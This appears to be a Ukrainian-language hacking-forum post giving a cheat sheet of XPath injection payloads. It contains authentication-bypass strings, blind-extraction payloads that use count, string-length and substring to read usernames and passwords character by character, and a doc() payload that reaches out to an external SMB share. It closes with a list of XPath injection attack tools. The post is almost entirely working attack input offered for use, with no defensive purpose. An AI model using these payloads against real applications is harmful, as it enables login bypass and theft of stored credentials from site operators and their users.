Vander
Команда форуму
- 10 Лис 2019
- 477
- 1,160
Exploitation
Аналогично SQL: "string (// user [name / text () = '" + vuln_var1 + "' and password / text () =’ "+ vuln_var1 +" '] / account / text ()) "
Код:
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
search=')] | //user/*[contains(*,'
search=Har') and contains(../password,'c
search=Har') and starts-with(../password,'c
Размер строки:
Код:
and string-length(account)=SIZE_INT
Код:
substring(//user[userid=5]/username,2,1)=CHAR_HERE
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
Код:
http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
- xcat - Automate XPath injection attacks to retrieve documents
- xxxpwn - Advanced XPath Injection Tool
- xxxpwn_smart - A fork of xxxpwn using predictive text
- xpath-blind-explorer
- XmlChor - Xpath injection exploitation tool